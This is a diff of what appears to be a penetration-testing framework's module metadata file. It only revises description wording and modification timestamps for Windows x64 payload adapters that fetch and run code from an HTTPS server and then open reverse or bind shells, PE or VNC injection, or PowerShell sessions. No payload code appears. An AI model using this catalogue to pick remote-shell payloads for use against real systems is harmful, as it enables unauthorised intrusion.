"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/peinject/bind_tcp_rc4",
|
||||
@@ -205278,7 +205639,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nListen for a connection with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for a connection with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/EgeBalci/Amber"
|
||||
],
|
||||
@@ -205288,7 +205649,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/peinject/bind_tcp_uuid",
|
||||
@@ -205320,7 +205681,7 @@
|
||||
"ege <egebalci@pm.me>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nConnect back to the attacker via a named pipe pivot",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker via a named pipe pivot",
|
||||
"references": [
|
||||
"URL-https://github.com/EgeBalci/Amber"
|
||||
],
|
||||
@@ -205330,7 +205691,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/peinject/reverse_named_pipe",
|
||||
@@ -205362,7 +205723,7 @@
|
||||
"ege <egebalci@pm.me>",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nConnect back to the attacker (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/EgeBalci/Amber"
|
||||
],
|
||||
@@ -205372,7 +205733,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/peinject/reverse_tcp",
|
||||
@@ -205409,7 +205770,7 @@
|
||||
"max3raza",
|
||||
"RageLtMan"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nConnect back to the attacker",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker",
|
||||
"references": [
|
||||
"URL-https://github.com/EgeBalci/Amber"
|
||||
],
|
||||
@@ -205419,7 +205780,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/peinject/reverse_tcp_rc4",
|
||||
@@ -205452,7 +205813,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nConnect back to the attacker with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/EgeBalci/Amber"
|
||||
],
|
||||
@@ -205462,7 +205823,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/peinject/reverse_tcp_uuid",
|
||||
@@ -205493,7 +205854,7 @@
|
||||
"Brendan Watters",
|
||||
"bwatters-r7"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nConnect back to attacker and report UUID (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to attacker and report UUID (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -205503,7 +205864,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/pingback_reverse_tcp",
|
||||
@@ -205534,7 +205895,7 @@
|
||||
"Dave Hardy",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.",
|
||||
"references": [
|
||||
"URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit"
|
||||
],
|
||||
@@ -205544,7 +205905,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/powershell_bind_tcp",
|
||||
@@ -205575,7 +205936,7 @@
|
||||
"Dave Hardy",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.",
|
||||
"references": [
|
||||
"URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit"
|
||||
],
|
||||
@@ -205585,7 +205946,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/powershell_reverse_tcp",
|
||||
@@ -205616,7 +205977,7 @@
|
||||
"Dave Hardy",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.",
|
||||
"references": [
|
||||
"URL-https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit"
|
||||
],
|
||||
@@ -205626,7 +205987,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/powershell_reverse_tcp_ssl",
|
||||
@@ -205655,7 +206016,7 @@
|
||||
"Brendan Watters",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -205665,7 +206026,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/shell/bind_ipv6_tcp",
|
||||
@@ -205697,7 +206058,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for an IPv6 connection with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -205707,7 +206068,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/shell/bind_ipv6_tcp_uuid",
|
||||
@@ -205739,7 +206100,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"UserExistsError"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a pipe connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a pipe connection (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -205749,7 +206110,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/shell/bind_named_pipe",
|
||||
@@ -205780,7 +206141,7 @@
|
||||
"Brendan Watters",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a connection (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -205790,7 +206151,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/shell/bind_tcp",
|
||||
@@ -205826,7 +206187,7 @@
|
||||
"max3raza",
|
||||
"RageLtMan"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -205836,7 +206197,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/shell/bind_tcp_rc4",
|
||||
@@ -205868,7 +206229,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a connection with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a piped command shell (Windows x64) (staged).\n\nListen for a connection with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -205878,7 +206239,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/shell/bind_tcp_uuid",
|
||||
@@ -205909,7 +206270,7 @@
|
||||
"Brendan Watters",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -205919,7 +206280,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/shell/reverse_tcp",
|
||||
@@ -205955,7 +206316,7 @@
|
||||
"max3raza",
|
||||
"RageLtMan"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -205965,7 +206326,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/shell/reverse_tcp_rc4",
|
||||
@@ -205997,7 +206358,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nSpawn a piped command shell (Windows x64) (staged).\n\nConnect back to the attacker with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -206007,7 +206368,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/shell/reverse_tcp_uuid",
|
||||
@@ -206038,7 +206399,7 @@
|
||||
"Brendan Watters",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nListen for a connection and spawn a command shell (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for a connection and spawn a command shell (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -206048,7 +206409,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/shell_bind_tcp",
|
||||
@@ -206077,7 +206438,7 @@
|
||||
"Brendan Watters",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nConnect back to attacker and spawn a command shell (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to attacker and spawn a command shell (Windows x64)",
|
||||
"references": [
|
||||
|
||||
],
|
||||
@@ -206087,7 +206448,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/shell_reverse_tcp",
|
||||
@@ -206116,7 +206477,7 @@
|
||||
"Brendan Watters",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nListen for an IPv6 connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for an IPv6 connection (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -206127,7 +206488,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/vncinject/bind_ipv6_tcp",
|
||||
@@ -206159,7 +206520,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nListen for an IPv6 connection with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for an IPv6 connection with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -206170,7 +206531,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/vncinject/bind_ipv6_tcp_uuid",
|
||||
@@ -206202,7 +206563,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"UserExistsError"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nListen for a pipe connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for a pipe connection (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -206213,7 +206574,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/vncinject/bind_named_pipe",
|
||||
@@ -206244,7 +206605,7 @@
|
||||
"Brendan Watters",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nListen for a connection (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for a connection (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -206255,7 +206616,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/vncinject/bind_tcp",
|
||||
@@ -206291,7 +206652,7 @@
|
||||
"max3raza",
|
||||
"RageLtMan"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nConnect back to the attacker",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -206302,7 +206663,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/vncinject/bind_tcp_rc4",
|
||||
@@ -206334,7 +206695,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nListen for a connection with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nListen for a connection with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -206345,7 +206706,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/vncinject/bind_tcp_uuid",
|
||||
@@ -206377,7 +206738,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -206388,7 +206749,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/vncinject/reverse_http",
|
||||
@@ -206422,7 +206783,7 @@
|
||||
"agix",
|
||||
"rwincey"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nTunnel communication over HTTP (Windows x64 wininet)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -206433,7 +206794,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/vncinject/reverse_https",
|
||||
@@ -206464,7 +206825,7 @@
|
||||
"Brendan Watters",
|
||||
"sf <stephen_fewer@harmonysecurity.com>"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nConnect back to the attacker (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -206475,7 +206836,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/vncinject/reverse_tcp",
|
||||
@@ -206511,7 +206872,7 @@
|
||||
"max3raza",
|
||||
"RageLtMan"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nConnect back to the attacker",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -206522,7 +206883,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/vncinject/reverse_tcp_rc4",
|
||||
@@ -206554,7 +206915,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nConnect back to the attacker with UUID Support (Windows x64)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nConnect back to the attacker with UUID Support (Windows x64)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -206565,7 +206926,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/vncinject/reverse_tcp_uuid",
|
||||
@@ -206597,7 +206958,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nTunnel communication over HTTP (Windows x64 winhttp)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nTunnel communication over HTTP (Windows x64 winhttp)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -206608,7 +206969,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/https/x64/vncinject/reverse_winhttp",
|
||||
@@ -206640,7 +207001,7 @@
|
||||
"sf <stephen_fewer@harmonysecurity.com>",
|
||||
"OJ Reeves"
|
||||
],
|
||||
"description": "Fetch and Execute an x64 payload from an https server.\n\nTunnel communication over HTTPS (Windows x64 winhttp)",
|
||||
"description": "Fetch and execute an x64 payload from an HTTPS server.\nTunnel communication over HTTPS (Windows x64 winhttp)",
|
||||
"references": [
|
||||
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
|
||||
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
|
||||
@@ -206651,7 +207012,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2023-03-15 19:19:19 +0000",
|
||||
"mod_time": "2024-01-03 14:46:15 +0000",
|
||||
